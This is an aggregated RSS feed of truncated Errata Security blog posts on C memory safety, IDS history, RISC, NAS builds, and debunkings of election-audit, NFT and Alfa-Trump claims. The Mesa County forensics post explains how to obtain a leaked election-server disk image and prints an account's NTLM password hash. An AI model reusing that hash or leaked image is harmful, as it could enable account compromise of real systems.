www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-02T21:48:31+00:00 www.secnews.physaphae.fr Errata Security - Errata Security C peut être sûr de la mémoire, partie 2<br>C can be memory safe, part 2 Ce message de l'année dernière a été publié à un forum, Alors j'ai pensé que je rédige quelques réfutations à leurs commentaires. Le premier commentaireest par David Chisnall, créateur de Cheri C / C ++, qui propose que nous pouvons résoudre le problème avec les extensions de jeu d'instructions CPU.C'est une bonne idée, mais après 14 ans, les processeurs n'ont pas eu leurs ensembles d'instructions améliorés.Même les processeurs RISC V traditionnels ont été créés en utilisant ces extensions. Chisnall: " Si votre sécurité vous oblige à insérer des vérifications explicites, ce n'est pas sûr ".Cela est vrai d'un point de vue, faux d'un autre.Ma proposition comprend des compilateurs crachant avertissements & nbsp; chaque fois que les informations limites n'existent pas. c est pleine de problèmes en théorie qui n'existe pas dans la pratique parce queLe compilateur crache des avertissements en disant aux programmeurs de résoudre le problème.Les avertissements peuvent également noter les cas où les programmeurs ont probablement fait des erreurs.Nous ne pouvons pas obtenir des garanties parfaites, car les programmeurs peuvent encore faire des erreurs, mais nous pouvons certainement réaliser "assez bon". Chisnall: .... Sécurité de la bande de roulement ..... je ne suis pas sûr de comprendre le commentaire.Je comprends que Cheri peut garantir l'atomicité de la vérification des limites, ce qui nécessiterait autrement des instructions (interruptibles).Le nombre de cas où il s'agit d'un problème, et la proposition C ne serait pas pire que d'autres langues comme la rouille. Chisnall: Sécurité temporelle .... & nbsp; Beaucoup de techniques de "propriété" de rouille peuvent être appliquées à C avec ces annotations, à savoir, marquant les variables possédant une mémoire allouée et qui l'emprunte simplement.J'ai examiné beaucoup de bogues célèbres de l'utilisation et de double libre, et la plupart peuvent être trivialement corrigées par annotation. Chisnall: si vous écrivez unLe blog n'a jamais essayé de faire de la grande (million de lignes ou plus) C Code Code Memory Safe, vous sous-estimez probablement la difficulté par au moins un ordre de grandeur. & nbsp; i \\ 'm à la fois un programmeurQui a écrit un million de lignes de code de ma vie ainsi qu'un pirate avec des décennies d'expérience à la recherche de tels bugs.L'objectif n'est pas de poursuivre l'idéal d'un langage 100% sûr, mais de se débarrasser de 99% des erreurs de sécurité.1% moins sûr rend l'objectif un ordre de grandeur plus facile à atteindre. snej: & nbsp; Ce message semble incarner le trait d'ingénieur commun de voir tout problème que vous avez \\ 't personnellementsur comme trivial.Bien sûr, Bro, vous ajoutez quelques correctifs à Clang et GCC et avec ces nouveaux attributs, notre code C sera sûr.Cela ne prendra que quelques semaines et plus personne n'aura plus besoin de rouille. & nbsp; mais j'ai passé des décennies à y travailler.Le commentaire incarne le trait commun de ne pas réaliser à quel point la pensée et l'expertise se trouvent derrière le post.Je quelques patchs à Cang et GCC feront en sorte que C plus sûr .La solution est beaucoup moins sûre que la rouille.En fait, ma proposition rend le code plus interopérable et traduisible en rouille.À l'heure actuelle, la traduction de C en rouille crée juste un tas de code \\ 'dangereux \' qui doit être nettoyé.Avec de telles annotations, dans une étape de refactorisation utilisant des cadres de test existants, des résultats en code qui ne peut pas être transporté automatiquement en toute sécurité à Rust. Quant aux attributs Clang / GCC existants, il n'y a qu'un couple qui correspondLes macros que je propo]]> 2024-02-14T17:30:42+00:00 https://blog.erratasec.com/2024/02/c-can-be-memory-safe-part-2.html www.secnews.physaphae.fr/article.php?IdArticle=8450167 False None None 2.0000000000000000 Errata Security - Errata Security C can be memory-safe fixed it by first adding a memory-bounds, then putting every access to the memory behind a macro PUSHC() that checks the memory-bounds:A better (but currently hypothetical) fix would be something like the following:size_t maxsize CHK_SIZE(outptr) = out ? *outlen : 0;This would link the memory-bounds maxsize with the memory outptr. The compiler can then be relied upon to do all the bounds checking to prevent buffer overflows, the rest of the code wouldn't need to be changed.An even better (and hypothetical) fix would be to change the function declaration like the following:int ossl_a2ulabel(const char *in, char *out, size_t *outlen CHK_INOUT_SIZE(out));That's the intent anyway, that *outlen is the memory-bounds of out on input, and receives a shorter bounds on output.This specific feature isn't in compilers. But gcc and clang already have other similar features. They've only been halfway implemented. This feature would be relatively easy to add. I'm currently studying the code to see how I can add it myself. I could just mostly copy what's done for the alloc_size attribute. But there's a considerable learning curve, I'd rather just persuade an existing developer of gcc or clang to add the new attributes for me.Once you give the programmer the ability to fix memory-safety problems like the solution above, you can then enable warnings for unsafe code. The compiler knew the above code was unsafe, but since there's no practical way to fix it, it's pointless nagging the programmer about it. With this new features comes warnings about failing to use it.In other words, it becomes compiler-guided refactoring. Forking code is hard, refactoring is easy.As the above function shows, the OpenSSL code is already somewhat memory safe, just based upon the flawed principle of relying upon diligent programmers. We need the compi]]> 2023-02-01T13:30:40+00:00 https://blog.erratasec.com/2023/02/c-can-be-memory-safe.html www.secnews.physaphae.fr/article.php?IdArticle=8306319 False None None 3.0000000000000000 Errata Security - Errata Security I\'m still bitter about Slammer NAPI drivers. The problem with interrupts is that a computer could handle less than 50,000 interrupts-per-second. If network traffic arrived faster than this, then the computer would hang, spending all it's time in the interrupt handler doing no other useful work. By turning off interrupts and instead polling for packets, this problem is prevented. The cost is that if the computer isn't heavily loaded by network traffic, then polling causes wasted CPU and electrical power. Linux NAPI drivers switch between them, interrupts when traffic is light and polling when traffic is heavy.The consequence is that a typical machine of the time (dual Pentium IIIs) could handle 2-million packets-per-second running my software, far better than the 50,000 packets-per-second of the competitors.When Slammer hit, it filled a 1-gbps Ethernet with 300,000 packets-per-second. As a consequence, pretty much all other IDS products fell over. Those that survived were attached to slower links -- 100-mbps was still common at the time.An industry luminary even gave a presentation at BlackHat saying that my claimed performance (2-million packets-per-second) was impossible, because everyone knew that computers couldn't handle traffic that fast. I couldn't combat that, even by explaining with very small words "but we disable interrupts".Now this is the norm. All network drivers are written with polling in mind. Specialized drivers like PF_RING and DPDK do even better. Networks appliances are now written using these things. Now you'd expect something like Snort to keep up and not get overloaded with interrupts. What makes me bitter is that back then, this was inexplicable magic.I wrote an article in PoC||GTFO 0x15 that shows how my portscanner masscan uses this driver, if you want more info.The second difference with my product was how signatures were written. Everyone else used signatures that triggered on the pattern-matching. Instead, my technology included protocol-analysis, code that parsed more than 100 protocols.The difference is that when there is an exploit of a buffer-overflow vulnerability, pattern-matching searched for patterns unique to the exploit. In my case, we'd measure the length of the buffer, triggering when it exceeded a certain length, finding any attempt to attack the vulnerability.The reason we could do this was through the use of state-machine parsers. Such analysis was considered heavy-weight and slow, which is why others avoided it. State-machines are faster than pattern-matching, many times faster. Better and faster.Such parsers are no]]> 2023-01-25T16:09:34+00:00 https://blog.erratasec.com/2023/01/im-still-bitter-about-slammer.html www.secnews.physaphae.fr/article.php?IdArticle=8304047 False Vulnerability,Guideline None 2.0000000000000000 Errata Security - Errata Security The RISC Deprogrammer this recent blogpost which starts out saying that "RISC is a set of design principles". No, it wasn't. Let's start from this sort of viewpoint to discuss this odd cult.What is RISC?Because of the march of Moore's Law, every year, more and more parts of a computer could be included onto a single chip. When chip densities reached the point where we could almost fit an entire computer on a chip, designers made tradeoffs, discarding unimportant stuff to make the fit happen. They made tradeoffs, deciding what needed to be included, what needed to change, and what needed to be discarded.RISC is a set of creative tradeoffs, meaningful at the time (early 1980s), but which were meaningless by the late 1990s.The interesting parts of CPU evolution are the three decades from 1964 with IBM's System/360 mainframe and 2007 with Apple's iPhone. The issue was a 32-bit core with memory-protection allowing isolation among different programs with virtual memory. These were real computers, from the modern perspective: real computers have at least 32-bit and an MMU (memory management unit).The year 1975 saw the release of Intel 8080 and MOS 6502, but these were 8-bit systems without memory protection. This was at the point of Moore's Law where we could get a useful CPU onto a single chip.In the year 1977 we saw DEC release it's VAX minicomputer, having a 32-bit CPU w/ MMU. Real computing had moved from insanely expensive mainframes filling entire rooms to less expensive devices that merely filled a rack. But the VAX was way too big to fit onto a chip at this time.The real interesting evolution of real computing happened in 1980 with Motorola's 68000 (aka. 68k) processor, essentially the first microprocessor that supported real computing.But this comes with caveats. Making microprocessor required creative work to decide what wasn't included. In the case of the 68k, it had only a 16-bit ALU. This meant adding two 32-bit registers required passing them twice through the ALU, adding each half separately. Because of this, many call the 68k a 16-bit rather than 32-bit microprocessor.More importantly, only the lower 24-bits of the registers were valid for memory addresses. Since it's memory addressing that makes a real computer "real", this is the more important measure. But 24-bits allows for 16-megabytes of memory, which is all that anybody could afford to include in a computer anyway. It was more than enough to run a real operating system like Unix. In contrast, 16-bit processors could only address 64-kilobytes of memory, and weren't really practical for real computing.The 68k didn't come with a MMU, but it allowed an extra MMU chip. Thus, the early 1980s saw an explosion of workstations and servers consisting of a 68k and an MMU. The most famous was Sun Microsystems launched in 1982, with their own custom designed MMU chip.Sun and its competitors transformed the industry running Unix. Many point to IBM's PC from 1982 as the transformative moment in computer history, but these were non-real 16-bit systems that struggled with more than 64k of memory. IBM PC computers wouldn't become real until 1993 with Microsoft's Windows NT, supporting full 32-bits, memory-protection, and pre-emptive multitasking.But except for Windows itself, the rest of computing is dominated by the Unix heritage. The phone in your hand, whether Android or iPhone, is a Unix compu]]> 2022-10-23T16:05:58+00:00 https://blog.erratasec.com/2022/10/the-risc-deprogrammer.html www.secnews.physaphae.fr/article.php?IdArticle=7654959 False Guideline Heritage None Errata Security - Errata Security DS620slim tiny home server In this blogpost, I describe the Synology DS620slim. Mostly these are notes for myself, so when I need to replace something in the future, I can remember how I built the system. It's a "NAS" (network attached storage) server that has six hot-swappable bays for 2.5 inch laptop drives.That's right, laptop 2.5 inch drives. It makes this a tiny server that you can hold in your hand.The purpose of a NAS is reliable storage. All disk drives eventually fail. If you stick a USB external drive on your desktop for backups, it'll eventually crash, losing any data on it. A failure is unlikely tomorrow, but a spinning disk will almost certainly fail some time in the next 10 years. If you want to keep things, like photos, for the rest of your life, you need to do something different.The solution is RAID, an array of redundant disks such that when one fails (or even two), you don't lose any data. You simply buy a new disk to replace the failed one and keep going. With occasional replacements (as failures happen) it can last decades. My older NAS is 10 years old and I've replaced all the disks, one slot replaced twice.This can be expensive. A NAS requires a separate box in addition to lots of drives. In my case, I'm spending $1500 for a 18-terabytes of disk space that would cost only $400 as an external USB drive. But amortized for the expected 10+ year lifespan, I'm paying $15/month for this home system.This unit is not just disk drives but also a server. Spending $500 just for a box to hold the drives is a bit expensive, but the advantage is that it's also a server that's powered on all the time. I can setup tasks to run on regular basis that would break if I tried to regularly run them on a laptop or desktop computer.There are lots of do-it-yourself solutions (like the Radaxa Taco carrier board for a Raspberry Pi 4 CM running Linux), but I'm choosing this solution because I want something that just works without any hassle, that's configured for exactly what I need. For example, eventually a disk will fail and I'll have to replace it, and I know now that this is something that will be effortless when it happens in the future, without having to relearn some arcane Linux commands that I've forgotten years ago.Despite this, I'm a geek who obsesses about things, so I'm still going to do possibly unnecessary things, like upgrading hardware: memory, network, and fan for an optimized system. Here are all the components of my system:$500 - DS620slim unit$1000 - 6x Seagate Barracuda 5TB 2.5 inch laptop drive (ST5000LM000)$100 - 2x Crucial 8GB DDR3 SODIMMs (CT2K102464BF186D)$30 - 2.5gbps Ethernet USB (CableCreation B07VNFLTLD)$15 - Noctua NF-A8 ULN ultra silent fan$360 - WD Elements 18TB USB drive (WDBWLG0180HBK-NESN)]]> 2022-07-03T19:02:22+00:00 https://blog.erratasec.com/2022/07/ds620slim-tiny-home-server.html www.secnews.physaphae.fr/article.php?IdArticle=5541752 False Ransomware,Guideline None None Errata Security - Errata Security No, a researcher didn\'t find Olympics app spying on you CitizenLab documents. However, another researcher goes further, claiming his analysis proves the app is recording all audio all the time. His analysis is fraudulent. He shows a lot of technical content that looks plausible, but nowhere does he show anything that substantiates his claims.Average techies may not be able to see this. It all looks technical. Therefore, I thought I'd describe one example of the problems with this data -- something the average techie can recognize.His "evidence" consists screenshots from reverse-engineering tools, with red arrows pointing to the suspicious bits. An example of one of these screenshots is this on:This screenshot is that of a reverse-engineering tool (Hopper, I think) that takes code and "disassembles" it. When you dump something into a reverse-engineering tool, it'll make a few assumptions about what it sees. These assumptions are usually wrong. There's a process where the human user looks at the analyzed output, does a "sniff-test" on whether it looks reasonable, and works with the tool until it gets the assumptions correct.That's the red flag above: the researcher has dumped the results of a reverse-engineering tool without recognizing that something is wrong in the analysis.It fails the sniff test. Different researchers will notice different things first. Famed google researcher Tavis Ormandy points out one flaw. In this post, I describe what jumps out first to me. That would be the 'imul' (multiplication) instruction shown in the blowup below:It's obviously ASCII. In other words, it's a series of bytes. The tool has tried to interpret these bytes as Intel x86 instructions (like 'and', 'insd', 'das', 'imul', etc.). But it's obviously not Intel x86, because those instructions make no sense.That 'imul' instruction is multiplying something by the (hex) number 0x6b657479. That doesn't look like a number -- it looks like four lower-case ASCII letters. ASCII lower-case letters are in the range 0x61 through 0x7A, so it's not the single 4-byte number 0x6b657479 but the 4 individual bytes 6b 65 74 79, which map to the ASCII letters 'k', 'e', 't]]> 2022-01-31T15:33:58+00:00 https://blog.erratasec.com/2022/01/no-researcher-didnt-find-olympics-app.html www.secnews.physaphae.fr/article.php?IdArticle=4061222 False Tool None None Errata Security - Errata Security Journalists: stop selling NFTs that you don\'t understand AP and NYTimes). They get important details wrong.The latest is Reason.com magazine selling an NFT. As libertarians, you'd think at least they'd get the technical details right. But they didn't. Instead of selling an NFT of the artwork, it's just an NFT of a URL. The URL points to OpenSea, which is known to remove artwork from its site (such as in response to DMCA takedown requests).If you buy that Reason.com NFT, what you'll actually get is a token pointing to:https://api.opensea.io/api/v1/metadata/0x495f947276749Ce646f68AC8c248420045cb7b5e/0x1F907774A05F9CD08975EBF7BF56BB4FF0A4EAF0000000000000060000000001This is just the metadata, which in turn contains a link to the claimed artwork:https://lh3.googleusercontent.com/8Q2OGcPuODtCxbTmlf3epFGOqbfCbs4fXZ2RcIMnLpRdTaYHgqKArk7uETRdSZmpRAFsNE8KB4sFJx6czKE5cBKB1pa7ovc4wBUdqQIf either OpenSea or Google removes the linked content, then any connection between the NFT and the artwork disappears.It doesn't have to be this way. The correct way to do NFT artwork is to point to a "hash" instead which uniquely identifies the work regardless of where it's located. That $69 million Beeple piece was done this correct way. It's completely decentralized. If the entire Internet disappeared except for the Ethereum blockchain, that Beeple NFT would still work.This is an analogy for the entire blockchain, cryptocurrency, and Dapp ecosystem: the hype you hear ignores technical details. They promise an entirely decentralized economy controlled by math and code, rather than any human entities. In practice, almost everything cheats, being tied to humans controlling things. In this case, the "Reason.com NFT artwork" is under control of OpenSea and not the "owner" of the token.Journalists have a problem. NFTs selling for millions of dollars are newsworthy, and it's the journalists place to report news rather than making judgements, like whether or not it's a scam. But at the same time, journalists are trying to explain things they don't understand. Instead of standing outside the story, simply quoting sources, they insert themselves into the story, becoming advocates rather than reporters. They can no longer be trusted as an objective observers.From a fraud perspective, it may not matter that the Reason.com NFT points to a URL instead of the promised artwork. The entire point of the blockchain is caveat emptor in action. Rules are supposed to be governed by code rather than companies, government, or the courts. There is no undoing of a transaction even if courts were to order it, because it's math.But from a journalistic point of view,  this is important. They failed at an honest description of what actually the NFT contains. They've involved themselves in the story, creating a conflict of interest. It's now hard for them to point out NFT scams when they themselves have participated in something that, from a certain point of view, could be viewed as a scam.]]> 2021-12-07T20:39:22+00:00 https://blog.erratasec.com/2021/12/journalists-stop-selling-nfts-that-you.html www.secnews.physaphae.fr/article.php?IdArticle=3759732 False None None None Errata Security - Errata Security Example: forensicating the Mesa County system image went rogue and dumped disk images of an election computer on the Internet. They are available on the Internet via BitTorrent [Mesa1][Mesa2], The Colorado Secretary of State is now suing her over the incident.The lawsuit describes the facts of the case, how she entered the building with an accomplice on Sunday, May 23, 2021. I thought I'd do some forensics on the image to get more details.Specifically, I see from the Mesa1 image that she logged on at 4:24pm and was done acquiring the image by 4:30pm, in and (presumably) out in under 7 minutes.In this blogpost, I go into more detail about how to get that information.The imageTo download the Mesa1 image, you need a program that can access BitTorrent, such as the Brave web browser or a BitTorrent client like qBittorrent. Either click on the "magnet" link or copy/paste into the program you'll use to download. It takes a minute to gather all the "metadata" associated with the link, but it'll soon start the download:What you get is file named EMSSERVER.E01. This is a container file that contains both the raw disk image as well as some forensics metadata, like the date it was collected, the forensics investigator, and so on. This container is in the well-known "EnCase Expert Witness" format. EnCase is a commercial product, but its container format is a quasi-standard in the industry.Some freeware utilities you can use to open this container and view the disk include "FTK Imager", "Autopsy", and on the Linux command line, "ewf-tools".However you access the E01 file, what you most want to look at is the Windows operating-system logs. These are located in the directory C:\Windows\system32\winevtx. The standard Windows "Event Viewer" application can load these log files to help you view them.When inserting a USB drive to create the disk image, these event files will be updated and written to that disk before the image was taken. Thus, we can see in the event files all the events that happen right before the disk image happens.Disk image acquisitionHere's what the event logs on the Mesa1 image tells us about the acquisition of the disk image itself.The person taking the disk image logged in at 4:24:16pm, directly to the console (not remotely), on their second attempt after first typing an incorrect password. The account used was "emsadmin". Their NTLM password hash is 9e4ec70af42436e5f0abf0a99e908b7a. This is a "role-based" account rather than an individual's account, but I think Tina Peters is the person responsible for the "emsadmin" roll.Then, at 4:26:10pm, they connected via USB a Western Digital  "easystore™" portable drive that holds 5-terabytes. This was mounted as the F: drive.The program "Access Data FTK Imager 4.2.0.13" was run from the USB drive (F:\FTK Imager\FTK Imager.exe) in order to image the system. The image was taken around 4:30pm, local Mountain Time (10:30pm GMT).It's impossible to say from this image what happened after it was taken. Presumab]]> 2021-11-07T20:09:32+00:00 https://blog.erratasec.com/2021/11/example-forensicating-mesa-county.html www.secnews.physaphae.fr/article.php?IdArticle=3624984 False None None 3.0000000000000000 Errata Security - Errata Security Debunking: that Jones Alfa-Trump report *]. In this blogpost, I debunk that report.If you'll recall, the conspiracy-theory comes from anomalous DNS traffic captured by cybersecurity researchers. In the summer of 2016, while Trump was denying involvement with Russian banks, the Alfa Bank in Russia was doing lookups on the name "mail1.trump-email.com". During this time,  additional lookups were also coming from two other organizations with suspicious ties to Trump, Spectrum Health and Heartland Payments.This is certainly suspicious, but people have taken it further. They have crafted a conspiracy-theory to explain the anomaly, namely that these organizations were secretly connecting to a Trump server.We know this explanation to be false. There is no Trump server, no real server at all, and no connections. Instead, the name was created and controlled by Cendyn. The server the name points to for transmitting bulk email and isn't really configured to accept connections. It's built for outgoing spam, not incoming connections. The Trump Org had no control over the name or the server. As Cendyn explains, the contract with the Trump Org ended in March 2016, after which they re-used the IP address for other marketing programs, but since they hadn't changed the DNS settings, this caused lookups of the DNS name.This still doesn't answer why Alfa, Spectrum, Heartland, and nobody else were doing the lookups. That's still a question. But the answer isn't secret connections to a Trump server. The evidence is pretty solid on that point.Daniel Jones and Democracy Integrity ProjectThe report is from Daniel Jones and his Democracy Integrity Project.It's at this point that things get squirrely. All sorts of right-wing sites claim he's a front for George Soros, funds Fusion GPS, and involved in the Steele Dossier. That's right-wing conspiracy theory nonsense.But at the same time, he's clearly not an independent and objective analyst. He was hired to further the interests of Democrats.If the data and analysis held up, then partisan ties wouldn't matter. But they don't hold up. Jones is clearly trying to be deceptive.The deception starts by repeatedly referring to the "Trump server". There is no Trump server. There is a Listrak server operated on behalf of Cendyn. Whether the Trump Org had any control over the name or the server is a key question the report should be trying to prove, not a premise. The report clearly understands this fact, so it can't be considered a mere mistake, but a deliberate deception.People make assumptions that a domain name like "trump-email.com" would be controlled by the Trump organization. It's wasn't. When Trump Hotels hired Cendyn to do marketing for them, Cendyn did what they normally do in such cases, register a domain with their client's name for the sending of bulk emails. They did the same thing with hyatt-email.com, denihan-email.com, mjh-email.com, and so on. What clear is that the Trump organization had no control, no direct ties to this domain until after the conspiracy-theory hit the press.Finding #1 - Alfa Bank, Spectrum Health, and Heartland account for nearly all of the DNS lookups for mail1.trump-email.com in the May-September timeframe.Yup, that's weird and unexplained.But it concludes from this that there were connections, saying the following:In the DNS environment, if "computer X" does a DNS look-up of "Computer Y," it means that "Computer X" is trying to connect to "Computer Y".This is false. That's certain]]> 2021-10-31T01:54:29+00:00 https://blog.erratasec.com/2021/10/debunking-that-jones-alfa-trump-report.html www.secnews.physaphae.fr/article.php?IdArticle=3587242 False None None None Errata Security - Errata Security Review: Dune (2021) This is Villeneuve's trademark, which you can see in his other works, like his sequel to Bladerunner. The purpose is to marvel at the visuals in every scene. The story telling is just enough to hold the visuals together. I mean, he also seems to do a good job with the story telling, but it's just not the reason to go see the movie. (I can't tell -- I've read the book, so see the story differently than those of you who haven't).Beyond the story and visuals, many of the actor's performances were phenomenal. Javier Bardem's "Stilgar" character steals his scenes. Stellan Skarsgård exudes evil. The two character actors playing the mentats were each perfect. I found the lead character (Timothée Chalamet) a bit annoying, but simply because he is at this point in the story.Villeneuve's splits the book into two parts. This movie is only the first part. This presents a problem, because up until this point, the main character is just responding to events, not the hero who yet drives the events. It doesn't fit into the traditional Hollywood accounting model. I really want to see the second film even if the first part, released in the post-pandemic turmoil of the movie industry, doesn't perform well at the box office.In short, if you haven't read the books, I'm not sure how well you'll follow the storytelling. But the visuals (seen at IMAX scale) and the characters are so great that I'm pretty sure most people will enjoy the movie. And go see it on IMAX in order to get the second movie made!!]]> 2021-10-24T19:46:46+00:00 https://blog.erratasec.com/2021/10/review-dune.html www.secnews.physaphae.fr/article.php?IdArticle=3556720 False Guideline None None Errata Security - Errata Security Fact check: that "forensics" of the Mesa image is crazy this "forensics" report. In this blogpost, I debunk that report.I suppose calling somebody a "conspiracy theorist" is insulting, but there's three objective ways we can identify them as such.The first is when they use the logic "everything we can't explain is proof of the conspiracy". In other words, since there's no other rational explanation, the only remaining explanation is the conspiracy-theory. But there can be other possible explanations -- just ones unknown to the person because they aren't smart enough to understand them. We see that here: the person writing this report doesn't understand some basic concepts, like "airgapped" networks.This leads to the second way to recognize a conspiracy-theory, when it demands this one thing that'll clear things up. Here, it's demanding that a manual audit/recount of Mesa County be performed. But it won't satisfy them. The Maricopa audit in neighboring Colorado, whose recount found no fraud, didn't clear anything up -- it just found more anomalies demanding more explanation. It's like Obama's birth certificate. The reason he ignored demands to show it was that first, there was no serious question (even if born in Kenya, he'd still be a natural born citizen -- just like how Cruz was born in Canada and McCain in Panama), and second, showing the birth certificate wouldn't change anything at all, as they'd just claim it was fake. There is no possibility of showing a birth certificate that can be proven isn't fake.The third way to objectively identify a conspiracy theory is when they repeat objectively crazy things. In this case, they keep demanding that the 2020 election be "decertified". That's not a thing. There is no regulation or law where that can happen. The most you can hope for is to use this information to prosecute the fraudster, prosecute the elections clerk who didn't follow procedure, or convince legislators to change the rules for the next election. But there's just no way to change the results of the last election even if wide spread fraud is now proven.The document makes 6 individual claims. Let's debunk them one-by-one.#1 Data Integrity ViolationThe report tracks some logs on how some votes were counted. It concludes:If the reasons behind these findings cannot be adequately explained, then the county's election results are indeterminate and must be decertified.This neatly demonstrates two conditions I cited above. The analyst can't explain the anomaly not because something bad happened, but because they don't understand how Dominion's voting software works. This demand for an explanation is a common attribute of conspiracy theories -- the ignorant keep finding things they don't understand and demand somebody else explain them.Secondly, there's the claim that the election results must be "decertified". It's something that Trump and his supporters believe is a thing, that somehow the courts will overturn the past election and reinstate Trump. This isn't a rational claim. It's not how the courts or the law works or the Constitution works.#2 Intentional purging of Log FilesThis is the issue that convinced Tina Peters to go rogue, that the normal Dominion software update gets rid of all the old system-log files. She leaked two disk-images, before and after the update, to show the disappearance of system-logs. She believes this violates the law demanding the "election records" be preserved. She claims because o]]> 2021-10-13T23:33:07+00:00 https://blog.erratasec.com/2021/10/fact-check-that-forensics-of-mesa-image.html www.secnews.physaphae.fr/article.php?IdArticle=3512368 False Guideline None None Errata Security - Errata Security 100 terabyte home NAS Synology, QNAP, or Asustor. I'm a nerd, and I have setup my own Linux systems with RAID, but I'd rather get a commercial product. When a disk fails, and a disk will always eventually fail, then I want something that will loudly beep at me and make it easy to replace the drive and repair the RAID.Some choices you have are:vendor (Synology, QNAP, and Asustor are the vendors I know and trust the most)number of bays (you want 8 to 12)redundancy (you want at least 2 if not 3 disks)filesystem (btrfs or ZFS) [not btrfs-raid builtin, but btrfs on top of RAID]drives (NAS optimized between $20/tb and $30/tb)networking (at least 2-gbps bonded, but box probably can't use all of 10gbps)backup (big external USB drives)The products I link above all have at least 8 drive bays. When you google "NAS", you'll get a list of smaller products. You don't want them. You want somewhere between 8 and 12 drives.The reason is that you want two-drive redundancy like RAID6 or RAIDZ2, meaning two additional drives. Everyone tells you one-disk redundancy (like RAID5) is enough, they are wrong. It's just legacy thinking, because it was sufficient in the past when drives were small. Disks are so big nowadays that you really need two-drive redundancy. If you have a 4-bay unit, then half the drives are used for redundancy. If you have a 12-bay unit, then only 2 out of the 12 drives are being used for redundancy.The next decision is the filesystem. There's only two choices, btrfs and ZFS. The reason is that they both healing and snapshots. Note btrfs means btrfs-on-RAID6, not btrfs-RAID, which is broken. In other words, btrfs contains its own RAID feature that you don't want to use.Over long periods of time, errors creep into the file system. You want to scrub the data occasionally. This means reading the entire filesystem, checksuming the files, and repairing them if there's a problem. That requires a filesystem that checksums each block of data.Another thing you want snapshots to guard against things like ransomware. This means you mark the files you want to keep, and even if a workstation attempts to change or delete the file, it'll still be held on the disk.QNAP uses ZFS while others like Synology and Asustor use btrfs. I really don't know which is better.It's cheaper to buy the NAS diskless then add your own disk drives. If you can't do this, then you'll be helpless when a drive fails and needs to be replaced.Drives cost between $20/tb and $30/tb right now. This recent article has a good buying guide. You probably want to get a NAS optimized hard drive. You probably want to double-check that it's CMR instead of SMR -- SMR is "shingled" vs. "conventional" magnetic recording. SMR is bad. There's only three hard drive makers (Seagate, Western Digital, and Toshiba), so there's not a big selection.Working with such large data sets over 1-gbps is painful. These units allow 802.3ad link aggregation as well as faster Ethernet. Some have 10gbe built-in, others allow a PCIe adapter to be plugged in.However, due to the overhead of spinning disks, you are unlikely to get 10gbps speeds. I mention this because 10gbps copper Ethernet sucks, so is not necessarily a buying criteria. You may prefer multigig/NBASE-T that only does 5gbps with relaxed cabling requirements and lower power consumption.This means that your NAS decision is going to be made with your home networki]]> 2021-10-10T20:35:49+00:00 https://blog.erratasec.com/2021/10/100-terabyte-home-nas.html www.secnews.physaphae.fr/article.php?IdArticle=3497828 False None None None Errata Security - Errata Security Check: that Republican audit of Maricopa https://arizonaagenda.substack.com/p/we-got-the-senate-audit-reportThe three main problems are:They misapply cybersecurity principles that are meaningful for normal networks, but which don't really apply to the air gapped networks we see here.They make some errors about technology, especially networking.They are overstretching themselves to find dirt, claiming the things they don't understand are evidence of something bad.In the parts below, I pick apart individual pieces from that document to demonstrate these criticisms. I focus on section 7, the cybersecurity section, and ignore the other parts of the document, where others are more qualified than I to opine.In short, when corrected, section 7 is nearly empty of any content.7.5.2.1.1 Software and Patch Management, part 1They claim Dominion is defective at one of the best-known cyber-security issues: applying patches.It's not true. The systems are “air gapped”, disconnected from the typical sort of threat that exploits unpatched systems. The primary security of the system is physical.This is standard in other industries with hard reliability constraints, like industrial or medical. Patches in those systems can destabilize systems and kill people, so these industries are risk averse. They prefer to mitigate the threat in other ways, such as with firewalls and air gaps.Yes, this approach is controversial. There are some in the cybersecurity community who use lack of patches as a bludgeon with which to bully any who don't apply every patch immediately. But this is because patching is more a political issue than a technical one. In the real, non-political world we live in, most things don't get immediately patched all the time.7.5.2.1.1 Software and Patch Management, part 2They claim new software executables were applied to the system, despite the rules against new software being applied. This isn't necessarily true.There are many reasons why Windows may create new software executables even when no new software is added. One reason is “Features on Demand” or FOD. You'll see new executables appear in C:\Windows\WinSxS for these. Another reason is their .NET language, which causes binary x86 executables to be created from bytecode. You'll see this in the C:\Windows\assembly directory.The auditors simply counted the number of new executables, with no indication which category they fell in. Maybe they are right, maybe new software was installed or old software updated. It's just that their mere counting of executable files doesn't show understanding of these differences.7.5.2.1.2 Log ManagementThe auditors claim that a central log management system should be used.This obviously wouldn't apply to “air gapped” systems, because it would need a connection to an external network.Dominion already designates their EMSERVER as the central log repository for their little air gapped network. Important files from C: are copied to D:, a RAID10 drive. This is a perfectly adequate solution, adding yet another computer to their little network would be overkill, and add as many security problems as it solved.One could argue more Windows logs need to be preserved, but that would simply mean archiving the from the C: drive onto the D: drive, not that you need to connect to the Internet to centrally log files.7.5.2.1.3 Credential ManagementLike the other sections, this claim is out of place]]> 2021-09-24T03:51:21+00:00 https://blog.erratasec.com/2021/09/check-that-republican-audit-of-maricopa.html www.secnews.physaphae.fr/article.php?IdArticle=3421939 False Threat,Patching None None Errata Security - Errata Security That Alfa-Trump Sussman indictment story about how DNS packets showed secret communications between Alfa Bank in Russia and the Trump Organization, proving a link that Trump denied. I was the only prominent tech expert that debunked this as just a conspiracy-theory[*][*][*].Last week, I was vindicated by the indictment of a lawyer involved, a Michael Sussman. It tells a story of where this data came from, and some problems with it.But we should first avoid reading too much into this indictment. It cherry picks data supporting its argument while excluding anything that disagrees with it. We see chat messages expressing doubt in the DNS data. If chat messages existed expressing confidence in the data, we wouldn't see them in the indictment.In addition, the indictment tries to make strong ties to the Hillary campaign and the Steele Dossier, but ultimately, it's weak. It looks to me like an outsider trying to ingratiated themselves with the Hillary campaign rather than there being part of a grand Clinton-lead conspiracy against Trump.With these caveats, we do see some important things about where the data came from.We see how Tech-Executive-1 used his position at cyber-security companies to search private data (namely, private DNS logs) to search for anything that might link Trump to somebody nefarious, including Russian banks. In other words, a link between Trump and Alfa bank wasn't something they accidentally found, it was one of the many thousands of links they looked for.Such a technique has been long known as a problem in science. If you cast the net wide enough, you are sure to find things that would otherwise be statistically unlikely. In other words, if you do hundreds of tests of hydroxychloroquine or invermectin on Covid-19, you are sure to find results that are so statistically unlikely that they wouldn't happen more than 1% of the time.If you search world-wide DNS logs, you are certain to find weird anomalies that you can't explain. Unexplained computer anomalies happen all the time, as every user of computers can tell you.We've seen from the start that the data was highly manipulated. It's likely that the data is real, that the DNS requests actually happened, but at the same time, it's been stripped of everything that might cast doubt on the 